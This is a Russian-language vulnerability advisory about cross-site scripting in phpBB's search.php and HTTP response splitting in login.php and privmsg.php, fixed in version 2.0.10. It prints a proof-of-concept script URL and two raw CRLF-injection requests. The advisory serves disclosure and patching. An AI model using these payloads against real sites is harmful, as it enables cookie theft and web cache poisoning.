Security Lab

Межcайтовый скриптинг и Response Splitting Attacks в phpBB форуме

Дата публикации:21.07.2004
Дата изменения:20.10.2006
Всего просмотров:2379
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: phpBB до версии 2.0.10

Описание: Уязвимость в phpBB позволяет удаленному пользователю выполнить XSS нападение.

1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример:

http://SERVER/phpBB2/search.php?search_author='<script>alert(document.cookie)</script>
Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в http://www.sanctuminc.com/pdf/WhitePaper_HTTPResponse.pdf). Удаленный пользователь может отравить Кеш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса:
POST /phpBB2/login.php HTTP/1.0
Host: SERVER
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-Type: application/x-www-form-urlencoded
Content-length: 129

logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT
P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!
Еще пример:
 
GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d
%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha!
HTTP/1.0
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Host: SERVER

URL производителя:http://www.phpbb.com/

Решение:Установите последнюю версию программы (2.0.10): http://www.phpbb.com/downloads.php

Ссылки: PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities